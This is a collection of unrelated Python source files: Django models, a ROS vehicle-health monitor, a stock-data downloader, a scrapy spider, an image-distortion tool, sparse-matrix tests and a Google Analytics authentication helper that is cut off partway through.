        # A resolvable builtin name evaluates to the object itself.
        entity = calltip.get_entity('int')
        self.assertIs(entity, int)
# Run the tests with verbose output when the module is executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Profile(models.Model):
    """Extra per-user data attached one-to-one to the auth User."""
    profile_photo = models.ImageField()
    bio = models.CharField(max_length = 60)
    user = models.OneToOneField(User,on_delete=models.CASCADE)

    def __str__(self):
        return self.bio

    def save_profile(self):
        """Persist this profile."""
        self.save()

    def delete_profile(self):
        """Remove this profile from the database."""
        self.delete()

    @classmethod
    def search_profile(cls, search_term):
        """Return profiles whose username contains search_term.

        BUG FIX: the original used 'user__icontains', which applies a string
        lookup directly to a relation and raises FieldError; the lookup must
        traverse to a text field on the related User.
        """
        return cls.objects.filter(user__username__icontains=search_term)
class Image(models.Model):
    """An uploaded image with a like count and simple search helpers."""
    images = models.ImageField()
    name = models.CharField(max_length = 60)
    caption = models.CharField(max_length = 100)
    likes = models.IntegerField()
    date = models.DateTimeField(auto_now_add=True)
    profile = models.ForeignKey(User,on_delete=models.CASCADE)

    def __str__(self):
        return self.name

    def save_image(self):
        """Persist this image."""
        self.save()

    def delete_image(self):
        """Remove this image from the database."""
        self.delete()

    def likes_total(self):
        """Return the like count.

        BUG FIX: 'likes' is an IntegerField, so the original's
        'self.likes.count()' raised AttributeError and returned nothing.
        """
        return self.likes

    @classmethod
    def search_image(cls, search_term):
        """Return images whose name contains search_term."""
        return cls.objects.filter(name__icontains=search_term)

    @classmethod
    def all_comment(cls):
        # NOTE(review): Image defines no 'comment' relation in this file;
        # this only works if a reverse FK named 'comment' exists elsewhere
        # -- confirm against the Comment model actually in use.
        return cls.comment.all()
class Comment(models.Model):
    """A user-authored comment with its creation timestamp."""
    comment = models.CharField(max_length = 100)
    date = models.DateTimeField(auto_now_add=True)
    profile = models.ForeignKey(User,on_delete=models.CASCADE)

    def __str__(self):
        return self.comment

    def save_comment(self):
        """Persist this comment."""
        self.save()

    def delete_comment(self):
        """Remove this comment from the database."""
        self.delete()

    @classmethod
    def get_comment(cls):
        """Return a queryset of every comment."""
        return cls.objects.all()
class NewsLetterEnts(models.Model):
    # Newsletter sign-up entry: just a display name and an address.
    name = models.CharField(max_length = 30)
    email = models.EmailField()
# Generated by Django 3.0.5 on 2021-11-22 11:23
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: redefines the choices for Book.category.
    # NOTE: migrations that may already be applied should not be edited.

    dependencies = [
        ('library', '0008_auto_20200412_1408'),
    ]

    operations = [
        migrations.AlterField(
            model_name='book',
            name='category',
            field=models.CharField(choices=[('education', 'Education'), ('entertainment', 'Entertainment'), ('comics', 'Comics'), ('biography', 'Biography'), ('history', 'History'), ('novel', 'Novel'), ('fantasy', 'Fantasy'), ('thriller', 'Thriller'), ('romance', 'Romance'), ('scifi', 'Sci-Fi')], default='education', max_length=30),
        ),
    ]
|
#!/usr/bin/env python
import rospy
import socket
from math import sqrt
from mavros_msgs.msg import RCIn
from sensor_msgs.msg import NavSatFix
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from system_monitor.msg import VehicleState
'''
This node verifies health for all modules, according to each module's monitors, and reports overall vehicle status
Statuses are:
0 - Error (when one of the peripheral sensor modules fails for some reason)
1 - Boot (initial state, vehicle waits for GPS fix and for sensor modules to report OK/Warning status)
2 - Service (Vehicle is operational)
3 - Recording (special state, only activated through an RC command)
'''
status_dict = {0: 'OK', 1: 'Warning', 2: 'Error', 3: 'Stale'}
class FSM:
    """Vehicle-health finite state machine.

    Subscribes to aggregated diagnostics, GPS fix and RC input, derives the
    overall vehicle state (ERROR / BOOT / SERVICE / RECORDING) and publishes
    it as a VehicleState message at 1 Hz.
    """

    def __init__(self, **kwargs):
        # Initial FSM state
        self.state = VehicleState.ERROR
        self.statedesc = 'ERROR'
        self.statename = 'Initializing'
        # ROS rate (1 Hz)
        self.rate = rospy.Rate(1)
        # Parameters
        self.vehicle_name = socket.gethostname()
        self.fix_topic = rospy.get_param("asv_description/fix_topic", default='/mavros/global_position/raw/fix')
        self.rec_topic = rospy.get_param("asv_description/record_command_topic", default='/mavros/rc/in')
        # Parameter is 1-based; RCIn.channels is 0-indexed.
        self.rec_cmd_channel = rospy.get_param("asv_description/record_command_channel", default=5) - 1
        self.rec_cmd_threshold = rospy.get_param("asv_description/record_command_threshold", default=20)
        # Publishers and subscribers
        self.status_pub = rospy.Publisher('/%s/vehicle/state' % socket.gethostname(), VehicleState, queue_size=10)
        self.diag_agg_sub = rospy.Subscriber('/diagnostics_agg', DiagnosticArray, callback=self.diag_callback)
        # BUG FIX: this subscriber was also assigned to self.diag_agg_sub,
        # silently overwriting the handle created just above.
        self.diag_toplevel_sub = rospy.Subscriber('/diagnostics_toplevel_state', DiagnosticStatus, callback=self.diag_toplevel_callback)
        self.rec_cmd_sub = rospy.Subscriber(self.rec_topic, RCIn, callback=self.rec_callback)
        self.fix_sub = rospy.Subscriber(self.fix_topic, NavSatFix, callback=self.fix_callback)
        # Messages: latest value received on each topic.
        self.rec_msg = RCIn()
        self.diag_agg_msg = DiagnosticArray()
        self.diag_toplevel_msg = DiagnosticStatus()
        self.vehicle_state = VehicleState()
        self.fix_msg = NavSatFix()

    # Subscriber callbacks: cache the most recent message of each kind.
    def rec_callback(self, msg):
        self.rec_msg = msg

    def diag_callback(self, msg):
        self.diag_agg_msg = msg

    def diag_toplevel_callback(self, msg):
        self.diag_toplevel_msg = msg

    def fix_callback(self, msg):
        self.fix_msg = msg

    def check_rec_cmd(self):
        """Return True when the RC record channel exceeds its threshold."""
        try:
            return self.rec_msg.channels[self.rec_cmd_channel] > self.rec_cmd_threshold
        except IndexError:
            # No RCIn message yet, or fewer channels than configured.
            return False

    def check_mod_health(self):
        """Return (toplevel, unhealthy).

        toplevel is 2 when any aggregated diagnostic is in error, else 0;
        unhealthy is a '; '-joined string of the failing module names.
        """
        toplevel = 0
        unhealthy = ''
        for diag in self.diag_agg_msg.status:
            # If some module is in error, append to a string
            if diag.level > 1:
                toplevel = 2
                unhealthy += '%s; ' % diag.name
        return toplevel, unhealthy

    def run(self):
        """Execute one FSM step, publish the state, and sleep one cycle."""
        # Get modules' health
        toplevel, unhealthy = self.check_mod_health()
        # Finite state machine (FSM)
        if self.state == VehicleState.ERROR:
            # If all modules are online (toplevel status is warning or OK)
            if toplevel <= 1:
                self.state = VehicleState.BOOT
                self.statename = 'BOOT'
                self.statedesc = 'Waiting for GPS fix'
        elif self.state == VehicleState.BOOT:
            # If modules are healthy and GPS has a fix
            if toplevel <= 1 and self.fix_msg.status.status >= 0:
                self.state = VehicleState.SERVICE
                self.statename = 'SERVICE'
                self.statedesc = 'Vehicle operational'
        elif self.state == VehicleState.SERVICE:
            # Fall back to BOOT when the GPS fix is lost
            if self.fix_msg.status.status < 0:
                self.state = VehicleState.BOOT
                self.statename = 'BOOT'
                self.statedesc = 'Waiting for GPS fix'
            # Check if record command on RC is enabled
            if self.check_rec_cmd():
                self.state = VehicleState.RECORDING
                self.statename = 'RECORDING'
                self.statedesc = 'Vehicle logging data'
        elif self.state == VehicleState.RECORDING:
            if not self.check_rec_cmd():
                self.state = VehicleState.SERVICE
                self.statename = 'SERVICE'
                self.statedesc = 'Vehicle operational'
        # Any module error forces ERROR regardless of the current state
        if toplevel > 1:
            self.state = VehicleState.ERROR
            self.statename = 'ERROR'
            self.statedesc = unhealthy
        # Publish current vehicle status
        self.vehicle_state.header.stamp = rospy.Time.now()
        self.vehicle_state.name = self.statename
        self.vehicle_state.id = self.state
        self.vehicle_state.description = self.statedesc
        self.status_pub.publish(self.vehicle_state)
        # Sleep for some time
        self.rate.sleep()
if __name__ == '__main__':
    rospy.init_node('vehicle_monitor', anonymous=True)
    fsm = FSM()
    # Run FSM while the ROS node is active. rate.sleep() raises
    # ROSInterruptException on shutdown; catch it so Ctrl-C / node kill
    # exits cleanly instead of printing a traceback.
    try:
        while not rospy.is_shutdown():
            fsm.run()
    except rospy.ROSInterruptException:
        pass
|
#!/usr/bin/python
# Download quarterly enterprise-value data from financialmodelingprep for
# every ticker in 0_symbols.csv, resuming after the last processed ticker.
print('EV - initiating.')
import os
import pandas as pd

# Folder layout, relative to the working directory.
cwd = os.getcwd()
input_folder = "0_input"
prices_folder = "data"
output_folder = "0_output"
temp_folder = "temp"
temp_EV = "EV"

# API token lives in 0_api_token.csv (first row, second column).
token_df = pd.read_csv(os.path.join(cwd, "0_api_token.csv"))
token = token_df.iloc[0, 1]

# URL fragments for the enterprise-values endpoint.
url1 = "https://financialmodelingprep.com/api/v3/enterprise-values/"
apikey = "apikey="
amp = "&"
csv = "?datatype=csv"
period_q = "period=quarter"

# prepare tickers list
tickers_narrowed = pd.read_csv(os.path.join(cwd, "0_symbols.csv"))
tickers = ' '.join(tickers_narrowed["symbol"].astype(str)).strip()

# find last updated ticker (this is necessary if you lose internet connection, etc)
last_ticker = pd.read_csv(os.path.join(cwd, input_folder, temp_folder, "EV_last_ticker.csv"), index_col=0)
last_ticker_nn = last_ticker.values[0][0]
print("last ticker in other was number", last_ticker_nn)

# start importing
index_max = pd.to_numeric(tickers_narrowed.index.values.max())
for t in tickers.split(' '):
    try:
        # Positional index of this ticker in the symbols file.
        n = pd.to_numeric(tickers_narrowed["symbol"][tickers_narrowed["symbol"] == t].index).values
        # BUG FIX: 'if n > last_ticker_nn' truth-tested a numpy array, which
        # fails for any match count other than one; test the scalar instead.
        if n.size and n[0] > last_ticker_nn:
            final_url = url1 + t + csv + amp + period_q + amp + apikey + token
            df = pd.read_csv(final_url)
            df['symbol'] = t
            df.to_csv(os.path.join(cwd, input_folder, temp_folder, temp_EV, t + ".csv"))
            # print & export last_n
            nn = n[0]  # get number out of numpy.array
            nnn = round(nn/index_max*100, 1)
            print("EV_q:", t, "/", nn, "from", index_max, "/", nnn, "%")
            last_ticker = pd.DataFrame({'number': n})
            last_ticker.to_csv(os.path.join(cwd, input_folder, temp_folder, "EV_last_ticker.csv"))
    except Exception as exc:
        # BUG FIX: was a bare 'except: pass', which also swallowed
        # KeyboardInterrupt/SystemExit; keep going but report the failure.
        print("EV_q: skipping", t, "-", exc)

# Reset the resume marker so the next full run starts from the beginning.
prices_last_ticker = pd.DataFrame({'number': [0]})
prices_last_ticker.to_csv(os.path.join(cwd, input_folder, temp_folder, "EV_last_ticker.csv"))
print('EV - done')
|
import scrapy
from alleco.objects.official import Official
from alleco.objects.official import getAllText
from re import sub
class monroeville_b(scrapy.Spider):
    # Spider for the Monroeville borough elected-officials page.
    name = "monroeville_b"
    muniName = "MONROEVILLE"
    muniType = "BOROUGH"
    complete = True

    def start_requests(self):
        # Single listing page; parse() handles the response.
        urls = ['https://www.monroeville.pa.us/elected.htm']
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        """Yield one Official per four-line record in each officials table.

        Assumes each table repeats (name, office, phone, extra) in groups of
        four text lines, and one mailto link per official, in the same order
        -- TODO confirm against the live page markup.
        """
        counter = 0
        for quote in response.xpath('//td[@width="609"]/table'):
            # Collapse internal whitespace runs in every extracted text node.
            names = [sub(r"\s+"," ",i) for i in getAllText(quote)]
            if counter==0: names = names[1:5]  # first table: keep lines 1-4 only
            emails = [i for i in quote.xpath('.//a/@href').getall() if "mailto:" in i]
            counter += 1
            for x in range(len(names)//4):
                yield Official(
                    muniName=self.muniName,
                    muniType=self.muniType,
                    office="MEMBER OF COUNCIL" if "Council" in names[x*4+1] else names[x*4+1].upper(),
                    name=names[x*4],
                    email=emails[x],  # assumes emails align 1:1 with records -- verify
                    district="AT-LARGE" if "Ward" not in names[x*4+1] else names[x*4+1][:6].upper(),
                    phone=names[x*4+2],
                    url=response.url)
|
import turtle as t
"""
Multi-line
strings
can act
as comments.
"""
# Single-line comment
print('Hello World')

# Turtle square demo (disabled):
# t.setup(width=0.6, height=0.6)
# t.pensize(4)
# t.pencolor('red')
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.mainloop()

# String methods.
message = "hello world again"
print(message.islower())

firstName = " ada "
lastName = " love "
# strip() trims the padding spaces before the names are joined.
fullName = f"{firstName.strip()} {lastName.strip()}"
print(fullName)

# Turtle star demo (disabled):
# t.color("red", "yellow")
# t.speed(10)
# t.begin_fill()
# for _ in range(50):
#     t.forward(200)
#     t.left(170)
# t.end_fill()
# t.mainloop()

# List operations.
testList = ["A", "B", "Hi", "B", "CDE"]
print(testList)
testList.append("DDD")
print(testList)
testList.pop()         # removes the "DDD" just appended
print(testList)
testList.remove("B")   # removes only the first "B"
print(testList)
del testList[0]
print(testList)
print(sorted(testList))  # sorted copy; testList itself is unchanged
testList.sort()
print(testList)
testList.reverse()
print(testList)
print(len(testList))
for item in testList:
    print(f"Hello this is {item.lower()}")

# BUG FIX: the list is named 'squares' but computed item ** item;
# square each value so the name matches the contents.
squares = [item ** 2 for item in range(1, 190)]
print(squares)

# Tuples.
myTuple = ("Hell0", "World", 123)
print(myTuple)
tuple2 = tuple()  # empty tuple
|
"""Remove radial distortion.
"""
from __future__ import division
import scipy as sp
import scipy.optimize
import scipy.ndimage
from skimage.transform import warp
import matplotlib.pyplot as plt
import numpy as np
import math
import sys
class RadialDistortionInterface:
    """Mouse interaction interface for radial distortion removal.

    Click sets of three points that should lie on a straight line; a
    non-left click fits the distortion model to those sets and displays
    the undistorted image.
    """

    def __init__(self, img):
        height, width = img.shape[:2]
        self.figure = plt.imshow(img, extent=(0, width, height, 0))
        plt.title('Removal of radial distortion')
        plt.xlabel('Select sets of three points with left mouse button,\n'
                   'click right button to process.')
        plt.connect('button_press_event', self.button_press)
        plt.connect('motion_notify_event', self.mouse_move)
        self.img = np.atleast_3d(img)
        self.points = []
        # Image centre: initial estimate of the distortion centre.
        self.centre = np.array([(width - 1)/2., (height - 1)/2.])
        self.height = height
        self.width = width
        self.make_cursorline()
        self.figure.axes.set_autoscale_on(False)
        plt.show()
        plt.close()

    def make_cursorline(self):
        # Rubber-band line that follows the cursor while picking points.
        self.cursorline, = plt.plot([0], [0], 'r:+',
                                    linewidth=2, markersize=15,
                                    markeredgecolor='b')

    def button_press(self, event):
        """Register mouse clicks.

        A left click stores a point; every third point freezes the current
        cursor line. Any other button triggers distortion removal.
        """
        if (event.button == 1 and event.xdata and event.ydata):
            self.points.append((event.xdata, event.ydata))
            print("Coordinate entered: (%f,%f)" % (event.xdata, event.ydata))
            if len(self.points) % 3 == 0:
                plt.gca().lines.append(self.cursorline)
                self.make_cursorline()
        if (event.button != 1 and len(self.points) >= 3):
            print("Removing distortion...")
            plt.gca().lines = []
            plt.draw()
            self.remove_distortion()
            self.points = []

    def mouse_move(self, event):
        """Handle cursor drawing.
        """
        pt_sets, pts_last_set = divmod(len(self.points), 3)
        pts = np.zeros((3, 2))
        if pts_last_set > 0:
            # Line follows up to 3 clicked points:
            pts[:pts_last_set] = self.points[-pts_last_set:]
            # The last point of the line follows the mouse cursor
            pts[pts_last_set:] = [event.xdata, event.ydata]
            self.cursorline.set_data(pts[:, 0], pts[:, 1])
            plt.draw()

    def remove_distortion(self, reshape=True):
        """Fit the radial distortion model to the clicked point sets and
        display the restored image plus the radius mapping curves."""

        def radial_tf(xy, p):
            """Radially distort coordinates.

            Given a coordinate (x,y), apply the radial distortion defined by

                L(r) = 1 + p[2]r + p[3]r^2 + p[4]r^3

            where

                r = sqrt((x-p[0])^2 + (y-p[1])^2)

            so that

                x' = L(r)x and y' = L(r)y

            Parameters
            ----------
            xy : (M, 2) ndarray
                Input coordinates.
            p : tuple
                Warp parameters:
                - p[0],p[1] -- Distortion centre
                - p[2], p[3], p[4] -- Radial distortion parameters

            Returns
            -------
            xy : (M, 2) ndarray
                Radially warped coordinates.
            """
            xy = np.array(xy, ndmin=2, copy=False)
            x = xy[:, 0]
            y = xy[:, 1]
            # Work in a centre-relative frame, scale radially, shift back.
            x = x - p[0]
            y = y - p[1]
            r = np.sqrt(x**2 + y**2)
            f = 1 + p[2]*r + p[3]*r**2 + p[4]*r**3
            return np.array([x*f + p[0], y*f + p[1]]).T

        def height_difference(p):
            """Measure deviation of distorted data points from straight line.

            References
            ----------
            http://paulbourke.net/geometry/pointlineplane/
            """
            out = 0
            for sets in 3 * np.arange(len(self.points) // 3):
                pts = np.array(self.points[sets:sets+3])
                xy = radial_tf(pts, p)
                # FIX: x and y were unpacked twice in the original;
                # a single unpacking is sufficient.
                x, y = xy.T
                # Find point on line (point0 <-> point2) closest to point1 (midpoint)
                u0 = ((x[0] - x[2])**2 + (y[0] - y[2])**2)
                if u0 == 0:
                    # Degenerate set (coinciding endpoints): constant penalty.
                    return 1
                u = ((x[1] - x[0]) * (x[2] - x[0]) +
                     (y[1] - y[0]) * (y[2] - y[0])) / u0
                # Intersection point
                ip_x = x[0] + u * (x[2] - x[0])
                ip_y = y[0] + u * (y[2] - y[0])
                # Distance between tip of triangle and midpoint
                out += (ip_x - x[1])**2 + (ip_y - y[1])**2
            return out

        # Find the distortion parameters for which the data points lie on a
        # straight line
        rc = sp.optimize.fmin(height_difference,
                              [self.centre[0], self.centre[1], 0., 0., 0.])

        # Determine inverse coefficient
        xy = np.array([np.linspace(0, self.width),
                       np.linspace(0, self.height)]).T

        def inv_min(p):
            # Take coordinates from a straight line and transform
            # to the "restored" domain with known rc
            xy_tf = radial_tf(xy, rc)
            # Transform back to the original image domain,
            # this time with the parameters p to be estimated
            xy_tf_back = radial_tf(xy_tf, p)
            return np.sum((xy_tf_back - xy)**2)

        # Find reverse transform via optimization
        rci = sp.optimize.fmin(inv_min, [rc[0], rc[1], 0., 0., 0.])

        # Find extents of forward transform
        out_shape = np.array((self.height, self.width))
        if reshape:
            top_corner = radial_tf([0., 0.], rc)
            bottom_corner = radial_tf([self.width - 1, self.height-1], rc)
            out_shape = (bottom_corner - top_corner)[0, ::-1]

        def radial_tf_shifted(xy, p):
            # NOTE(review): top_corner is only defined when reshape=True;
            # calling with reshape=False would raise NameError (pre-existing).
            xy += top_corner
            xy = radial_tf(xy, p)
            return xy

        restored_image = warp(self.img, radial_tf_shifted, {'p': rci},
                              output_shape=out_shape.astype(int))

        plt.figure()
        plt.imshow(restored_image)

        # Plot forward and reverse transforms
        x = np.linspace(self.width / 2, self.width)
        y = np.linspace(self.height / 2, self.height)
        r = np.sqrt((x - self.centre[0])**2 + (y - self.centre[1])**2)
        xy = np.array([x, y]).T
        xyr = radial_tf(xy, rc) - self.centre
        xyri = radial_tf(xy, rci) - self.centre
        rf = np.hypot(*xyr.T)
        rr = np.hypot(*xyri.T)

        a = plt.axes([0.15, .15, .15, .15])
        plt.plot(r, rf, label='Forward mapping')
        plt.plot(r, rr, ':', label='Reverse mapping')
        plt.grid()
        #plt.xlabel('Input radius')
        #plt.ylabel('Transformed radius')
        #plt.legend()
        #plt.setp(a, xticks=[], yticks=[])
        plt.show()
from skimage.io import imread

# CLI entry point: load the image named on the command line and start the
# interactive distortion-removal session. Runs at import time (no main guard).
if len(sys.argv) != 2:
    print("Usage: %s <image-file>" % sys.argv[0])
else:
    img = imread(sys.argv[1])
    rdi = RadialDistortionInterface(img)
|
from numpy import array, abs
try:
import hermes_common._hermes_common
normal_import = True
except ImportError:
normal_import = False
if normal_import:
# Running in h1d, h2d or h3d:
from hermes_common._hermes_common import CooMatrix, CSRMatrix, CSCMatrix
else:
# Running from inside hermes_common
from _hermes_common import CooMatrix, CSRMatrix, CSCMatrix
eps = 1e-10
def _eq(a, b):
return (abs(a-b) < eps).all()
def _coo_conversions_test(m, d2):
    """Check COO matrix m against dense d2 through every conversion path."""
    # COO -> dense
    assert _eq(m.to_scipy_coo().todense(), d2)
    # COO -> CSR and COO -> CSC
    csr = CSRMatrix(m)
    assert _eq(csr.to_scipy_csr().todense(), d2)
    csc = CSCMatrix(m)
    assert _eq(csc.to_scipy_csc().todense(), d2)
    # CSC -> CSR -> CSC round trip
    csr = CSRMatrix(csc)
    assert _eq(csr.to_scipy_csr().todense(), d2)
    csc = CSCMatrix(csr)
    assert _eq(csc.to_scipy_csc().todense(), d2)
def test_matrix1():
    """Real COO matrix; the duplicate (2, 3) entry must accumulate to 5.5."""
    entries = [(1, 3, 3.5), (2, 3, 4.5), (3, 4, 1.5), (4, 2, 1.5), (2, 3, 1)]
    mat = CooMatrix(5)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 0, 0, 0],
        [0, 0, 0, 3.5, 0],
        [0, 0, 0, 5.5, 0],
        [0, 0, 0, 0, 1.5],
        [0, 0, 1.5, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
def test_matrix2():
    """Like test_matrix1 but with an entry in row 0 instead of row 4."""
    entries = [(1, 3, 3.5), (2, 3, 4.5), (3, 4, 1.5), (0, 2, 1.5), (2, 3, 1)]
    mat = CooMatrix(5)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 1.5, 0, 0],
        [0, 0, 0, 3.5, 0],
        [0, 0, 0, 5.5, 0],
        [0, 0, 0, 0, 1.5],
        [0, 0, 0, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
def test_matrix3():
    """Denser real matrix; also checks the raw CSR/CSC internal arrays."""
    entries = [(0, 0, 2), (0, 1, 3), (1, 0, 3), (1, 2, 4), (1, 4, 6),
               (2, 1, -1), (2, 2, -3), (2, 3, 2), (3, 2, 1),
               (4, 1, 4), (4, 2, 2), (4, 4, 1)]
    mat = CooMatrix(5)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [2, 3, 0, 0, 0],
        [3, 0, 4, 0, 6],
        [0,-1,-3, 2, 0],
        [0, 0, 1, 0, 0],
        [0, 4, 2, 0, 1],
    ])
    _coo_conversions_test(mat, expected)
    # CSR internals: row pointers, column indices, values.
    mat = CSRMatrix(mat)
    assert _eq(mat.IA, [0, 2, 5, 8, 9, 12])
    assert _eq(mat.JA, [0, 1, 0, 2, 4, 1, 2, 3, 2, 1, 2, 4])
    assert _eq(mat.A, [2, 3, 3, 4, 6, -1, -3, 2, 1, 4, 2, 1])
    # CSC internals: column pointers, row indices, values.
    mat = CSCMatrix(mat)
    assert _eq(mat.JA, [0, 2, 5, 9, 10, 12])
    assert _eq(mat.IA, [0, 1, 0, 2, 4, 1, 2, 3, 4, 2, 1, 4])
    assert _eq(mat.A, [2, 3, 3, -1, 4, 4, -3, 1, 2, 2, 6, 1])
def test_matrix4():
    """Complex-typed COO matrix holding real values; duplicates accumulate."""
    entries = [(1, 3, 3.5), (2, 3, 4.5), (3, 4, 1.5), (4, 2, 1.5), (2, 3, 1)]
    mat = CooMatrix(5, is_complex=True)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 0, 0, 0],
        [0, 0, 0, 3.5, 0],
        [0, 0, 0, 5.5, 0],
        [0, 0, 0, 0, 1.5],
        [0, 0, 1.5, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
def test_matrix5():
    """Complex-typed matrix, real values, with an entry in row 0."""
    entries = [(1, 3, 3.5), (2, 3, 4.5), (3, 4, 1.5), (0, 2, 1.5), (2, 3, 1)]
    mat = CooMatrix(5, is_complex=True)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 1.5, 0, 0],
        [0, 0, 0, 3.5, 0],
        [0, 0, 0, 5.5, 0],
        [0, 0, 0, 0, 1.5],
        [0, 0, 0, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
def test_matrix6():
    """Genuinely complex values; the duplicate (2, 3) entry sums to 5.5+2j."""
    entries = [(1, 3, 3.5+1j), (2, 3, 4.5+2j), (3, 4, 1.5+3j),
               (0, 2, 1.5+4j), (2, 3, 1)]
    mat = CooMatrix(5, is_complex=True)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 1.5+4j, 0, 0],
        [0, 0, 0, 3.5+1j, 0],
        [0, 0, 0, 5.5+2j, 0],
        [0, 0, 0, 0, 1.5+3j],
        [0, 0, 0, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
def test_matrix7():
    """Complex duplicates at (1, 3) and (2, 3) must each accumulate."""
    entries = [(1, 3, 3.5+1j), (2, 3, 4.5+2j), (3, 4, 1.5+3j),
               (1, 3, 1.5+4j), (2, 3, 1+4j)]
    mat = CooMatrix(5, is_complex=True)
    for row, col, value in entries:
        mat.add(row, col, value)
    expected = array([
        [0, 0, 0, 0, 0],
        [0, 0, 0, 5+5j, 0],
        [0, 0, 0, 5.5+6j, 0],
        [0, 0, 0, 0, 1.5+3j],
        [0, 0, 0, 0, 0],
    ])
    _coo_conversions_test(mat, expected)
|
"""
Allows users to authenticate a service account or installed application using
either:
* A .json key file for service accounts (must be in root directory of
where your script is run)
* A .env file with a path to the .json key for service accounts
* If no .env file is provided the environment variables will be checked
for `GOOGLE_APPLICATION_CREDENTIALS`
* A .json oauth2 credentials file for installed applications (must be in
root directory of where your script is run)
Examples:
To authenticate and retrieve a Google API service with a service account::
import gapipy as ga
# For .json files, from_service=True is on by default
service = ga.authenticate(fileName="example.json")
# For .env files
service = ga.authenticate()
To authenticate and retrieve a Google API service with a installed
application::
import gapipy as ga
# Must always provide from_service=False and a file name
service = ga.authenticate(fileName="example.json")
Attributes:
BASEDIR (os.path): Gets the working directory of where the module is
imported to. This allows the authentication process
to find a specified .json or .env file.
DEFAULT_SCOPE (list): List of scopes that will define what the
authenticated service can access. Access to profile,
email and openid is
needed with oauth2 verification.
REQUIRED_ENV_VAR (string): Name of required environment variable for service
account authentication from environment. Variable
should point to the absolute path of the .json
file.
API_NAME (string): Specifies the [Google Analytics Reporting API]
(https://developers.google.com/analytics/devguides/reporting/core/v4/).
The Google Analytics API v3 is still available but it is
recommended to use the Reporting API to get full access
to features.
API_VERSION (string): Specifies the latest version of the Reporting API.
"""
import os
import warnings

from dotenv import load_dotenv
from google import auth
from google.oauth2 import service_account
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient import discovery
# Working directory; .json key and .env files are resolved relative to this.
BASEDIR = os.getcwd()
# Scopes requested for the authenticated service; profile, email and openid
# are needed for oauth2 verification (see module docstring).
DEFAULT_SCOPE = ['https://www.googleapis.com/auth/analytics.readonly',
                 'https://www.googleapis.com/auth/userinfo.profile',
                 'https://www.googleapis.com/auth/userinfo.email',
                 'openid'
                 ]
# Environment variable that must point at the service-account .json key.
REQUIRED_ENV_VAR = "GOOGLE_APPLICATION_CREDENTIALS"
# Google Analytics Reporting API, version 4.
API_NAME = "analyticsreporting"
API_VERSION = "v4"
def authenticate(from_service=True, fileName=None):
    """Authenticate a Google Analytics Reporting API service.

    Args:
        from_service (bool, optional): True for service-account
            authentication (.json / .env / environment variables), False
            for an installed application. Defaults to True.
        fileName (string, optional): Name of the .json file holding either
            the service-account key or the installed-app client secret.
            Defaults to None.

    Raises:
        FileNotFoundError: When oauth authentication is requested without a
            client secrets file.

    Returns:
        Resource: A Google API Resource object for querying the API.
    """
    # Guard clause: oauth flow is impossible without a client secrets file.
    if not from_service and not fileName:
        raise FileNotFoundError(
            "If using oauth you must specify a file name using fileName"
            "parameter.")
    if from_service:
        return _authenticate_service(fileName)
    return _authenticate_install(fileName)
# TODO: Unit tests
def _authenticate_service(fileName=None):
    """Authenticate a service account from a key file or the environment.

    Tries the provided .json key file first; otherwise loads a .env file
    (if present) and falls back to GOOGLE_APPLICATION_CREDENTIALS.

    Args:
        fileName (string, optional): File name passed through from
            authenticate(). Defaults to None.

    Raises:
        FileNotFoundError: Raised when the provided file cannot be found.
        ValueError: Raised when GOOGLE_APPLICATION_CREDENTIALS cannot be
            found in the environment variables.

    Returns:
        Client wrapping a Google API Resource object.
    """
    if fileName:
        filePath = os.path.join(BASEDIR, fileName)
        if os.path.isfile(filePath):
            credentials = service_account.Credentials.from_service_account_file(
                filename=filePath, scopes=DEFAULT_SCOPE)
        else:
            # BUG FIX: adjacent string literals were concatenated without
            # separating spaces ("Pleaseonly", "extension.File", ...).
            raise FileNotFoundError(
                "Cannot find your provided file. Please only pass a file "
                "name and .json extension. File should be located in the "
                "same directory as where you are running your script from.")
    else:
        filePath = os.path.join(BASEDIR, ".env")
        if os.path.isfile(filePath):
            load_dotenv(filePath)
        else:
            # BUG FIX: this used to *raise* RuntimeWarning, aborting even
            # though the message promises to keep checking the environment;
            # emit a real warning and continue instead.
            warnings.warn(
                "The .env file cannot be found, still checking environment "
                f"for {REQUIRED_ENV_VAR}. Make sure you are storing the "
                "file in the same directory as where you are running your "
                "script from.", RuntimeWarning)
        if REQUIRED_ENV_VAR in os.environ:
            credentials, _ = auth.default(scopes=DEFAULT_SCOPE)
        else:
            raise ValueError(
                f"Could not find {REQUIRED_ENV_VAR} in environment "
                "variables. Make sure it is specified in your .env file or "
                "in the environment.")
    return Client(_build(credentials))
# TODO: Add option to store and load credentials.
# TODO: Unit tests
def _authenticate_install(fileName):
    """Authenticate an installed application from a client secrets file.

    Args:
        fileName (string): File name passed through from authenticate().

    Raises:
        FileNotFoundError: Raised when the provided file cannot be found.

    Returns:
        Client wrapping a Google API Resource object.
    """
    filePath = os.path.join(BASEDIR, fileName)
    if not os.path.isfile(filePath):
        # BUG FIX: adjacent string literals were concatenated without
        # separating spaces ("onlypass", "Fileshould", ...).
        raise FileNotFoundError(
            "Cannot find your provided file. Please only pass a file name "
            "and .json extension. File should be located in the same "
            "directory as where you are running your script from.")
    flow = InstalledAppFlow.from_client_secrets_file(
        filePath, scopes=DEFAULT_SCOPE)
    # Opens a local browser window for the user to grant access.
    flow.run_local_server()
    credentials = flow.credentials
    return Client(_build(credentials))
def _build(credentials):
    # Build the Reporting API resource from already-authenticated credentials.
